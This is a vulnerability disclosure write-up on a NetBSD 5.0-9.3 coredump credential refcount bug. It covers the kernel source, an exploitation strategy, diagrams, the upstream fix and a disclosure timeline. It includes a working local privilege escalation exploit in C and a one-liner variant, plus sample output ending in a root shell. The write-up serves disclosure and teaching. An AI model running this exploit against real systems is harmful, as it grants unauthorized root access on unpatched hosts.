Crash Override: NetBSD 5.0-9.3 Coredump Kernel Refcount LPE

2nd October, 2022

chris

Introduction

NetBSD 5.0 (released 2009) changed the in-kernel coredump handler in a way that accidentally introduced a reference count bug on the crashing process' credential.

Triggering the vulnerability leads to a use-after-free that can be trivially (though slowly) exploited to achieve local privilege escalation, gaining root from an unprivileged starting point.

Figure: The proof-of-concept privesc exploit in action against NetBSD 9.3.

This article will discuss the simplicity of both the vulnerability and exploitation strategy, leading onto a functional proof of concept exploit.

The vulnerability affects all versions of NetBSD from 5.0 through to 9.3 and can be exploited in an architecture-independent manner. A fix was pushed to the NetBSD 8.x and NetBSD 9.x branches, followed by an advisory soon afterwards.

Special thanks to Christos Zoulas of NetBSD for keeping me personally updated, and for authoring and pushing through the relevant advisory.

Vulnerability Overview

Coredumps are created for processes when they appear to have unexpectedly terminated. The idea is to capture as much debug information as possible to assist somebody in diagnosing what actually happened and why. These coredumps are usually written to disk in the current working directory of the process with a .core file extension.

We can see the jumping off point for invoking any registered coredump handler in the guts of the signal handling code:

    /*
     * Force the current process to exit with the specified signal, dumping core
     * if appropriate.  We bypass the normal tests for masked and caught
     * signals, allowing unrecoverable failures to terminate the process without
     * changing signal state.  Mark the accounting record with the signal
     * termination.  If dumping core, save the signal number for the debugger.
     * Calls exit and does not return.
     */
    void
    sigexit(struct lwp *l, int signo)
    {
        int exitsig, error, docore;
    ...
[1]     if ((docore = (sigprop[signo] & SA_CORE)) != 0) {
    ...
        if (docore) {
            mutex_exit(p->p_lock);
[2]         MODULE_HOOK_CALL(coredump_hook, (l, NULL), enosys(), error);

If a signal is configured to force an exit of the process then we end up in this sigexit function. Further, if the specific signal has been configured to trigger a coredump [1] then we reach a call to whatever coredump_hook has been configured [2].
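From userland, the easiest way to land in this path is to die from a signal whose default action dumps core. Here's a minimal sketch of that: fork a child that calls abort(3), then look at the wait status in the parent. The helper names crash_child_and_reap and status_dumped_core are made up for illustration, and WCOREDUMP is a common extension rather than strict POSIX, so it's guarded.

```c
#include <assert.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Hypothetical helper: fork a child that dies from SIGABRT and return the
 * raw wait status to the caller, or -1 if fork/waitpid failed.
 */
int
crash_child_and_reap(void)
{
    int status;
    pid_t pid = fork();

    if (pid == -1)
        return -1;
    if (pid == 0)
        abort();        /* child: SIGABRT's default action dumps core */

    assert(pid > 0);    /* parent: pid is the child's process id */
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return status;
}

/* Returns 1 if the status reports a core dump, 0 if not, -1 if unknown. */
int
status_dumped_core(int status)
{
#ifdef WCOREDUMP
    return (WIFSIGNALED(status) && WCOREDUMP(status)) ? 1 : 0;
#else
    (void)status;
    return -1;
#endif
}
```

Whether a core file actually gets written depends on resource limits and directory permissions, so status_dumped_core may well report 0 even though the kernel went through its coredump handler.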

There is only one coredump handler registered in the NetBSD codebase:

            MODULE_HOOK_SET(coredump_hook, coredump);

The coredump function describes itself well and is pretty simple:

    /*
     * Dump core, into a file named "progname.core" or "core" (depending on the
     * value of shortcorename), unless the process was setuid/setgid.
     */
    static int
    coredump(struct lwp *l, const char *pattern)
    {
        struct vnode        *vp;
        struct proc     *p;
        struct vmspace      *vm;
        kauth_cred_t        cred;
        struct pathbuf      *pb;
        struct vattr        vattr;
        struct coredump_iostate io;
        struct plimit       *lim;
        int         error, error1;
        char            *name, *lastslash;
    ...
        /*
         * It may well not be curproc, so grab a reference to its current
         * credentials.
         */
[3]     kauth_cred_hold(p->p_cred);
        cred = p->p_cred;
    ...
[4]     pb = pathbuf_create(name);
        if (pb == NULL) {
            error = ENOMEM;
            goto done;
        }
[5]     error = vn_open(NULL, pb, 0, O_CREAT | O_NOFOLLOW | FWRITE,
            S_IRUSR | S_IWUSR, &vp, NULL, NULL);
        if (error != 0) {
            pathbuf_destroy(pb);
[6]         goto done;
        }
    ...
[7] done:
        if (name != NULL)
            PNBUF_PUT(name);
        return error;
    }

One of the first things the function does is hold onto the crashing process' credential [3]. This takes a reference on it so that it can't go away while it's being dealt with.

Omitted from the snippet here is the logic for building up the corefile name. Once it has been built, the function goes on to create a pathbuf from it [4] and then tries to open that path for writing through vn_open at [5].

If that vn_open fails for any reason — for instance, if the crashing process doesn't have permission to create files in the current directory — then the code jumps to done [6].

At done, we expect to see the cleanup code for the failed coredump attempt [7]. The name pathname buffer is indeed put, but nothing else happens here.

Importantly, the reference taken on the credential at [3] is never released. In fact, none of the error or success paths seem to do this.

This is the vulnerability: it's a classic refcount bug that we can trigger by crashing one of our processes.
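To make the shape of the bug concrete, here's a small userland model of it. This is only a sketch: toy_cred, toy_cred_hold and toy_coredump_buggy are hypothetical stand-ins, not kernel code, and the numbered comments refer back to the markers in the coredump listing.

```c
#include <assert.h>
#include <stddef.h>

/* Toy stand-in for a refcounted credential; not the kernel's kauth_cred_t. */
struct toy_cred {
    unsigned int refcnt;
};

static void
toy_cred_hold(struct toy_cred *c)
{
    assert(c != NULL);
    c->refcnt++;
}

/*
 * Models the shape of the buggy handler: take a reference up front, then
 * leave through "done" without ever dropping it. open_fails selects the
 * error path, but both paths leak. Returns 0 on success, -1 on failure.
 */
int
toy_coredump_buggy(struct toy_cred *proc_cred, int open_fails)
{
    int error = 0;

    toy_cred_hold(proc_cred);   /* like [3]: reference taken */

    if (open_fails) {
        error = -1;             /* like [6]: bail out */
        goto done;
    }
    /* ... the dump itself would be written here ... */
done:
    return error;               /* like [7]: no matching release */
}
```

Every call leaves refcnt one higher than it found it, regardless of which path was taken. That's all the primitive we get, and it turns out to be enough.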

Exploitability Analysis

To understand whether this refcount bug is exploitable, we need to ensure that a wrap of the refcount won't be detected or prevented. We can find that out by looking at the kauth_cred_hold function:

    /* Increment reference count to cred. */
    void
    kauth_cred_hold(kauth_cred_t cred)
    {
        KASSERT(cred != NULL);
        KASSERT(cred != NOCRED);
        KASSERT(cred != FSCRED);
        KASSERT(cred->cr_refcnt > 0);
    
[1]     atomic_inc_uint(&cred->cr_refcnt);
    }

We see here that atomic_inc_uint is used to increment the reference count [1]. That will not detect the wrap. The KASSERTs in this function are also essentially nops for anything other than debug kernels, so we can ignore them.

Also worth noting is that cr_refcnt is a u_int. That's 32 bits wide on the platforms we probably care about, which means that wrapping the count is feasible.
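The arithmetic behind "feasible" is worth spelling out. Below is a rough sketch, assuming a 32-bit counter; the function names and the leak rate used in the note afterwards are purely illustrative and not measurements from my testing.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Number of increments needed to move a 32-bit counter from `current` to
 * `target`, wrapping past UINT32_MAX if necessary. The result is reduced
 * modulo 2^32, which is exactly how the counter itself behaves.
 */
uint32_t
increments_to_reach(uint32_t current, uint32_t target)
{
    return target - current;
}

/* Rough wall-clock estimate in hours for a hypothetical leak rate. */
double
hours_to_leak(uint32_t increments, double leaks_per_second)
{
    assert(leaks_per_second > 0.0);
    return (double)increments / leaks_per_second / 3600.0;
}
```

For example, increments_to_reach(1, 0) is 4294967295, so a count of 1 needs 2^32 - 1 leaked references to come back around to zero. At a made-up rate of 100,000 leaks per second that works out to a little under 12 hours; a 64-bit counter would put the same attack far out of reach.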

Assuming we can wrap the reference count and trigger a path that decrements it afterwards, what happens? We can answer that by looking at the responsible function, kauth_cred_free:

    /* Decrease reference count to cred. If reached zero, free it. */
    void
    kauth_cred_free(kauth_cred_t cred)
    {
    
        KASSERT(cred != NULL);
        KASSERT(cred != NOCRED);
        KASSERT(cred != FSCRED);
        KASSERT(cred->cr_refcnt > 0);
        ASSERT_SLEEPABLE();
    
    #ifndef __HAVE_ATOMIC_AS_MEMBAR
        membar_release();
    #endif
[2]     if (atomic_dec_uint_nv(&cred->cr_refcnt) > 0)
            return;
    #ifndef __HAVE_ATOMIC_AS_MEMBAR
        membar_acquire();
    #endif
    
        kauth_cred_hook(cred, KAUTH_CRED_FREE, NULL, NULL);
        specificdata_fini(kauth_domain, &cred->cr_sd);
[3]     pool_cache_put(kauth_cred_cache, cred);
    }

This function decrements the refcount and, if it's still positive [2], simply returns.

If the refcount did drop to zero then a little tidying up is done before putting the credential back into the kauth_cred_cache [3].

This is an interesting point to note: kauth_cred_ts are allocated from their own dedicated pool and not the general purpose heap. This fact informs our exploit development process.

I admit to knowing next to nothing about the NetBSD kernel heap. Even so, without knowing any of the internals, we can make an educated guess that it probably works in a last-in, first-out (LIFO) fashion, as most kernel heap implementations tend to.
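To illustrate what that guess means in practice, here's a toy fixed-size pool with a LIFO free list. It is emphatically not how NetBSD's pool_cache is implemented; every name in it is hypothetical and it only exists to show the property we're hoping for.

```c
#include <assert.h>
#include <stddef.h>

/* Toy fixed-size object pool with a LIFO free list; all names hypothetical. */
struct toy_obj {
    struct toy_obj *next_free;  /* link used only while the object is free */
    unsigned int payload;
};

struct toy_pool {
    struct toy_obj *free_head;
};

/* Push every slot of `slots` onto the free list. */
void
toy_pool_init(struct toy_pool *pool, struct toy_obj *slots, size_t n)
{
    pool->free_head = NULL;
    for (size_t i = 0; i < n; i++) {
        slots[i].next_free = pool->free_head;
        pool->free_head = &slots[i];
    }
}

/* Pop the most recently freed object, or NULL if the pool is empty. */
struct toy_obj *
toy_pool_get(struct toy_pool *pool)
{
    struct toy_obj *obj = pool->free_head;

    if (obj != NULL)
        pool->free_head = obj->next_free;
    return obj;
}

/* Push an object back; it becomes the next one handed out. */
void
toy_pool_put(struct toy_pool *pool, struct toy_obj *obj)
{
    assert(obj != NULL);
    obj->next_free = pool->free_head;
    pool->free_head = obj;
}
```

The property that matters is that a toy_pool_put followed immediately by a toy_pool_get hands back the same address. If the real credential pool behaves similarly, a stale pointer to a freed credential will alias the very next credential allocated.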

Exploitation Strategy

We need to think about how we might exploit this:

1. Trigger the vulnerability to wrap the kauth_cred_t refcount to 1.
2. Cause kauth_cred_free to get called somehow.
3. Have a privileged kauth_cred_t allocated in its place.

If we assume the kernel heap operates on a LIFO basis, this should be enough to elevate our privileges. So what could be a convenient way of calling kauth_cred_free on our credential?

One very simple observation is that kauth_cred_free is called when a process is reaped. This leads to a nice simple strategy of repeating the following steps in a loop:

1. Fork.
2. In the child, trigger a coredump (e.g. through abort(3)).
3. In the parent, reap the child through wait(2).

Eventually that reap at step 3 will drop the kauth_cred_t reference from its wrapped value of 1 down to 0 and cause it to be freed, leaving the parent process with a dangling credential on its process (p->p_cred).
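The bookkeeping for that loop can be modelled in a few lines. This is a simplified sketch that assumes fork gives the child one reference on the parent's credential and that reaping drops one; it ignores any other holders the real kernel has, and the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/*
 * One fork/crash/reap round against a toy 32-bit refcount. Returns 1 if
 * the reap dropped the count to zero (the credential would be freed while
 * the parent still points at it), otherwise 0.
 */
int
toy_round(uint32_t *refcnt)
{
    (*refcnt)++;                /* fork: child shares the parent's credential */
    (*refcnt)++;                /* coredump: reference taken, never dropped */
    return --(*refcnt) == 0;    /* reap: child's reference released */
}

/* Count the rounds needed before a reap frees the credential. */
uint64_t
toy_rounds_until_free(uint32_t start)
{
    uint32_t refcnt = start;
    uint64_t rounds = 1;

    while (!toy_round(&refcnt))
        rounds++;
    return rounds;
}
```

Each round is a net gain of one reference, so starting six short of the wrap (UINT32_MAX - 5) takes six rounds. In this model a count that starts at 1 needs 2^32 - 1 rounds, which is why the real thing is slow.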

With a dangling kauth_cred_t pointer, our next job is to allocate a privileged credential in its place. How could we do that? Amusingly, it turns out that we can just call setuid(0); and magically become root. :)

Let's start out by looking at sys_setuid:

    /* ARGSUSED */
    int
    sys_setuid(struct lwp *l, const struct sys_setuid_args *uap, register_t *retval)
    {
        /* {
            syscallarg(uid_t) uid;
        } */
        uid_t uid = SCARG(uap, uid);
    
[1]     return do_setresuid(l, uid, uid, uid,
                    ID_R_EQ_R | ID_E_EQ_R | ID_S_EQ_R);
    }

Most of the core logic of the various setuid functions is actually implemented by the do_setresuid function [1].

    /*
     * Set real, effective and saved uids to the requested values.
     * non-root callers can only ever change uids to values that match
     * one of the processes current uid values.
     * This is further restricted by the flags argument.
     */
    
    int
    do_setresuid(struct lwp *l, uid_t r, uid_t e, uid_t sv, u_int flags)
    {
        struct proc *p = l->l_proc;
        kauth_cred_t cred, ncred;
    
[2]     ncred = kauth_cred_alloc();
    
        /* Get a write lock on the process credential. */
        proc_crmod_enter();
[3]     cred = p->p_cred;
    
        /*
         * Check that the new value is one of the allowed existing values,
         * or that we have root privilege.
         */
        if ((r != -1
            && !((flags & ID_R_EQ_R) && r == kauth_cred_getuid(cred))
            && !((flags & ID_R_EQ_E) && r == kauth_cred_geteuid(cred))
            && !((flags & ID_R_EQ_S) && r == kauth_cred_getsvuid(cred))) ||
            (e != -1
            && !((flags & ID_E_EQ_R) && e == kauth_cred_getuid(cred))
            && !((flags & ID_E_EQ_E) && e == kauth_cred_geteuid(cred))
            && !((flags & ID_E_EQ_S) && e == kauth_cred_getsvuid(cred))) ||
            (sv != -1
            && !((flags & ID_S_EQ_R) && sv == kauth_cred_getuid(cred))
            && !((flags & ID_S_EQ_E) && sv == kauth_cred_geteuid(cred))
            && !((flags & ID_S_EQ_S) && sv == kauth_cred_getsvuid(cred)))) {
            int error;
    
            error = kauth_authorize_process(cred, KAUTH_PROCESS_SETID,
                p, NULL, NULL, NULL);
            if (error != 0) {
                proc_crmod_leave(cred, ncred, false);
                return error;
            }
        }
    
        /* If nothing has changed, short circuit the request */
[4]     if ((r == -1 || r == kauth_cred_getuid(cred))
            && (e == -1 || e == kauth_cred_geteuid(cred))
            && (sv == -1 || sv == kauth_cred_getsvuid(cred))) {
[5]         proc_crmod_leave(cred, ncred, false);
            return 0;
        }
    ...

The very first thing that happens in this function is that a new credential, ncred, is allocated [2]. We also pull out the pointer to the current credential, cred [3].

Given that the kernel heap is LIFO and p->p_cred is dangling, we actually end up in the situation where ncred == cred. So p->p_cred is now pointing to whatever kauth_cred_alloc returned:

    /* Allocate new, empty kauth credentials. */
    kauth_cred_t
    kauth_cred_alloc(void)
    {
        kauth_cred_t cred;
    
        cred = pool_cache_get(kauth_cred_cache, PR_WAITOK);
    
        cred->cr_refcnt = 1;
        cred->cr_uid = 0;
        cred->cr_euid = 0;
        cred->cr_svuid = 0;
        cred->cr_gid = 0;
        cred->cr_egid = 0;
        cred->cr_svgid = 0;
        cred->cr_ngroups = 0;
    
        specificdata_init(kauth_domain, &cred->cr_sd);
        kauth_cred_hook(cred, KAUTH_CRED_INIT, NULL, NULL);
    
        return (cred);
    }

Aha, that just happens to be a nice pure root cred. :)

With both ncred and cred pointing to a pure root cred, we skip over the first big if-statement in do_setresuid and land at [4]. The conditions at [4] now check out and we call proc_crmod_leave before returning success to userland.

We are now magically root.

An important side note here is that our p->p_cred is actually still dangling: that's because the call to proc_crmod_leave drops a reference on one of the cred arguments. Since the cred has a refcount of 1 at this point, a free will occur.
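Here's the whole aliasing trick as a userland model. It's a sketch under the LIFO assumption, with the permission logic heavily simplified compared to do_setresuid; all toy_ names are hypothetical, and the credentials live in static storage so that reading "freed" memory is well defined in the model.

```c
#include <assert.h>
#include <stddef.h>

/* Toy credential backed by static storage so "freed" memory stays readable. */
struct toy_cred {
    unsigned int refcnt;
    unsigned int uid;
    struct toy_cred *next_free;
};

struct toy_proc {
    struct toy_cred *p_cred;
};

static struct toy_cred toy_slots[2];
static struct toy_cred *toy_free_head;

/* Put both slots on the free list. */
void
toy_pool_reset(void)
{
    toy_free_head = NULL;
    for (size_t i = 0; i < 2; i++) {
        toy_slots[i].next_free = toy_free_head;
        toy_free_head = &toy_slots[i];
    }
}

/* Drop a reference; at zero, LIFO-release so it is the next allocation. */
void
toy_cred_free(struct toy_cred *c)
{
    assert(c->refcnt > 0);
    if (--c->refcnt > 0)
        return;
    c->next_free = toy_free_head;
    toy_free_head = c;
}

/* Like kauth_cred_alloc in the listing: fresh credentials start as uid 0. */
struct toy_cred *
toy_cred_alloc(void)
{
    struct toy_cred *c = toy_free_head;

    assert(c != NULL);
    toy_free_head = c->next_free;
    c->refcnt = 1;
    c->uid = 0;
    return c;
}

/* Simplified setuid: returns 0 on success, -1 when permission is denied. */
int
toy_setuid(struct toy_proc *p, unsigned int uid)
{
    struct toy_cred *ncred = toy_cred_alloc();  /* may alias p->p_cred */
    struct toy_cred *cred = p->p_cred;

    if (uid != cred->uid && cred->uid != 0) {
        toy_cred_free(ncred);   /* not root, not our own uid: denied */
        return -1;
    }
    if (uid == cred->uid) {     /* "nothing has changed" short circuit */
        toy_cred_free(ncred);
        return 0;
    }
    ncred->uid = uid;           /* elided in the listing; modelled loosely */
    p->p_cred = ncred;
    toy_cred_free(cred);
    return 0;
}
```

With a live credential of uid 1000, toy_setuid(&p, 0) is refused. Once that credential has been freed behind the process' back, the same call allocates the stale slot, stamps uid 0 over it, and then sails through the short circuit. It also frees the slot again on the way out, which is the thin ice mentioned above.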

But that's okay as long as we're careful: figuring out how to secure our access and leave the system in a stable state from this point is academic. For our proof of concept, just doing this will be fine.

The final process is:

Loop while setuid(0) fails:
1. Fork.
2. In the child, call abort(3) to trigger a coredump.
3. In the parent, call wait(2) to reap the child.
If we've exited the loop, we're now root, so drop to a shell.

Visualisation

Some ASCII art can help visualise this process. After many coredumps, the cr_refcnt of our kauth_cred_t has wrapped around to zero, even though both the parent and a freshly forked child still point at it:


┌────────────────────┐                                              
│                    │                                              
│                    │                                              
│    parent proc     │─p_cred─┐                                     
│                    │        │                                     
│                    │        │         ┌──────────────────────────┐
└────────────────────┘        │         │                          │
           │                  │         │       kauth_cred_t       │
           │                  │         │        uid: 1000         │
           │                  ├────────▶│       cr_refcnt: 0       │
           ▼                  │         │                          │
┌────────────────────┐        │         │                          │
│                    │        │         └──────────────────────────┘
│                    │ p_cred │                                     
│     child proc     │────────┘                                     
│                    │                                              
│                    │                                              
└────────────────────┘

Now when this child triggers a coredump, we end up with yet another reference taken:


┌────────────────────┐                                              
│                    │                                              
│                    │                                              
│    parent proc     │─p_cred─┐                                     
│                    │        │                                     
│                    │        │         ┌──────────────────────────┐
└────────────────────┘        │         │                          │
           │                  │         │       kauth_cred_t       │
           │                  │         │        uid: 1000         │
           │                  ├────────▶│       cr_refcnt: 1       │
           ▼                  │         │                          │
┌────────────────────┐        │         │                          │
│                    │        │         └──────────────────────────┘
│     child proc     │ p_cred │                                     
│   <in coredump>    │────────┘                                     
│                    │                                              
│                    │                                              
└────────────────────┘

Since coredump bumps the refcount to 1 and leaves it there, when the parent process now comes to reap the child, kauth_cred_free will see cr_refcnt drop to zero and free the cred:


                                     ┌ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ 
┌────────────────────┐                                          │
│                    │               │      <free memory>        
│                    │                       kauth_cred_t       │
│    parent proc     │────p_cred────▶│        uid: 1000          
│                    │                       cr_refcnt: 0       │
│                    │               │                           
└────────────────────┘                ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┘

Now our process' p_cred points to something that still looks like a cred, but it's actually been freed.

Calling setuid(0); now will allocate that same virtual address, overwrite it, find that we already appear to be root and return success (freeing the cred back again). That leaves us in this state:


                                     ┌ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ 
┌────────────────────┐                                          │
│                    │               │      <free memory>        
│                    │                       kauth_cred_t       │
│    parent proc     │────p_cred────▶│          uid: 0           
│                    │                       cr_refcnt: 0       │
│                    │               │                           
└────────────────────┘                ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┘

Our p_cred is still pointing to freed memory, but now it looks like a root cred because of how do_setresuid works. We're effectively root, even if we are standing on thin ice at this point.

Proof of Concept Exploit

Here's the code with utility code omitted:

/*
 * Crash Override: NetBSD 5.0-9.3 Coredump LPE PoC
 * By [email protected] / 2022-Sep-06
 */
#include <machine/limits.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

#include "libpoc.h"

const char *poc_title = "NetBSD 5.0-9.3 Coredump Local Privilege Escalation (Crash Override)";
const char *poc_author = "[email protected]";

int
main(int argc, char *argv[])
{
    unsigned int n;
    char * const av[] = { "/bin/sh", "-i", NULL };
    char * const ev[] = { "PATH=/bin:/sbin:/usr/bin:/usr/sbin", NULL };

    banner();

    log_info("Changing directory to /");
    expect(chdir("/"));

    log_info("Beginning refcount wrap");
    for (n = 0; n < UINT_MAX; ++n) {
        if (!(n & 0x000fffff)) {
            log_progress("Progress: 0x%08x / ~0x%08x...", n, UINT_MAX);
        }

        if (!vfork()) {
            abort();
        } else {
            expect(wait(NULL));
        }

        if (!setuid(0)) {
            break;
        }
    }

    log_progress_complete();

    if (getuid() == 0) {
        log_info("Success!");
        expect(execve(av[0], av, ev));
    }

    log_fatal("Failed");
    return 0;
}

A full PoC archive is provided at the end of the article.

We can also make this a terrible one-liner for which I can only apologise:

/* cc -o d d.c && ./d */
main(){while((vfork()||*(int*)0)&&(!wait(0)||setuid(0)));execl("/bin/sh","-i",0);}

Triggering this particular refcount bug takes some time since we're continuously creating and destroying processes as we go. This was compounded by the fact that my experiments were being done on an emulated amd64 QEMU VM; all of my machines are Apple Silicon these days. vfork helps substantially over fork, but it's still a multi-hour marathon to complete the wrap.

To simplify exploit development, I decided to cheat. I modified the kernel coredump function locally to wrap after p->p_cred->cr_refcnt exceeded 200, then recompiled overnight. This gave me confidence that the bug was real without being too expensive time-wise.

Once the technique was proven, I repeated the attack against unmodified, clean installs of both NetBSD 9.3 and NetBSD 8.0, as those represented the span of currently-maintained releases at time of writing. The exploit succeeded just fine on both.

Here's some sample output of the PoC running:

$ uname -msr
NetBSD 9.3 amd64
$ make all && ./crash-override
cc  -c -o crash-override.o crash-override.c
cc  -c -o libpoc.o libpoc.c
cc  -o crash-override crash-override.o libpoc.o
[+] NetBSD 5.0-9.3 Coredump Local Privilege Escalation (Crash Override)
[+] By [email protected]
[+] ---
[+] Changing directory to /
[+] Beginning refcount wrap
[+] Progress: 0xfff00000 / ~0xffffffff...
[+] Success!
# id
uid=0(root) gid=0(wheel)
# whoami
root
#

Fix

I reported the issue to the NetBSD Security Alert Team on the 6th of September, 2022. The issue was quickly fixed with the following patch:

diff --git a/sys/kern/kern_core.c b/sys/kern/kern_core.c
index c42bcfb229ea..22f47c894ae8 100644
--- a/sys/kern/kern_core.c
+++ b/sys/kern/kern_core.c
@@ -1,4 +1,4 @@
-/*	$NetBSD: kern_core.c,v 1.35 2021/06/29 22:40:53 dholland Exp $	*/
+/*	$NetBSD: kern_core.c,v 1.36 2022/09/09 14:30:17 christos Exp $	*/
 
 /*
  * Copyright (c) 1982, 1986, 1989, 1991, 1993
@@ -37,7 +37,7 @@
  */
 
 #include <sys/cdefs.h>
-__KERNEL_RCSID(0, "$NetBSD: kern_core.c,v 1.35 2021/06/29 22:40:53 dholland Exp $");
+__KERNEL_RCSID(0, "$NetBSD: kern_core.c,v 1.36 2022/09/09 14:30:17 christos Exp $");
 
 #ifdef _KERNEL_OPT
 #include "opt_execfmt.h"
@@ -121,7 +121,7 @@ coredump(struct lwp *l, const char *pattern)
 	struct vnode		*vp;
 	struct proc		*p;
 	struct vmspace		*vm;
-	kauth_cred_t		cred;
+	kauth_cred_t		cred = NULL;
 	struct pathbuf		*pb;
 	struct vattr		vattr;
 	struct coredump_iostate	io;
@@ -145,9 +145,7 @@ coredump(struct lwp *l, const char *pattern)
 	if (USPACE + ctob(vm->vm_dsize + vm->vm_ssize) >=
 	    p->p_rlimit[RLIMIT_CORE].rlim_cur) {
 		error = EFBIG;		/* better error code? */
-		mutex_exit(p->p_lock);
-		mutex_exit(&proc_lock);
-		goto done;
+		goto release;
 	}
 
 	/*
@@ -164,9 +162,7 @@ coredump(struct lwp *l, const char *pattern)
 	if (p->p_flag & PK_SUGID) {
 		if (!security_setidcore_dump) {
 			error = EPERM;
-			mutex_exit(p->p_lock);
-			mutex_exit(&proc_lock);
-			goto done;
+			goto release;
 		}
 		pattern = security_setidcore_path;
 	}
@@ -180,11 +176,8 @@ coredump(struct lwp *l, const char *pattern)
 	error = coredump_buildname(p, name, pattern, MAXPATHLEN);
 	mutex_exit(&lim->pl_lock);
 
-	if (error) {
-		mutex_exit(p->p_lock);
-		mutex_exit(&proc_lock);
-		goto done;
-	}
+	if (error)
+		goto release;
 
 	/*
 	 * On a simple filename, see if the filesystem allow us to write
@@ -198,6 +191,7 @@ coredump(struct lwp *l, const char *pattern)
 			error = EPERM;
 	}
 
+release:
 	mutex_exit(p->p_lock);
 	mutex_exit(&proc_lock);
 	if (error)
@@ -284,6 +278,8 @@ coredump(struct lwp *l, const char *pattern)
 	if (error == 0)
 		error = error1;
 done:
+	if (cred != NULL)
+		kauth_cred_free(cred);
 	if (name != NULL)
 		PNBUF_PUT(name);
 	return error;

We can see that the fix correctly adds the missing kauth_cred_free call to the exit path.
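The pattern in the patch is the usual single-exit cleanup idiom. Here's a userland sketch of it, with hypothetical toy_ names. The NULL initialiser in the diff suggests that some exits can be reached before the reference is taken, so the model includes one such early exit; that's my reading of the diff rather than something the patch states.

```c
#include <assert.h>
#include <stddef.h>

struct toy_cred {
    unsigned int refcnt;
};

static void
toy_cred_hold(struct toy_cred *c)
{
    c->refcnt++;
}

static void
toy_cred_free(struct toy_cred *c)
{
    assert(c->refcnt > 0);
    c->refcnt--;    /* a real implementation frees the object at zero */
}

/*
 * Shape of the patched handler: `cred` starts as NULL so that exits taken
 * before the hold skip the release, while every later exit drops exactly
 * the reference that was taken. fail_early / fail_open pick the exit path.
 */
int
toy_coredump_fixed(struct toy_cred *proc_cred, int fail_early, int fail_open)
{
    struct toy_cred *cred = NULL;
    int error = 0;

    if (fail_early) {           /* exit taken before any reference is held */
        error = -1;
        goto done;
    }

    toy_cred_hold(proc_cred);
    cred = proc_cred;

    if (fail_open) {            /* e.g. the core file could not be opened */
        error = -1;
        goto done;
    }
    /* ... the dump itself would be written here ... */
done:
    if (cred != NULL)
        toy_cred_free(cred);
    return error;
}
```

Whichever path is taken, the count comes out exactly as it went in, which is the invariant the original code was missing.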

The patch was made for NetBSD 8.x and 9.x; releases prior to NetBSD 8.0 are not maintained per the NetBSD maintenance policy and so won't receive the fix.

PoC Archive

Download here.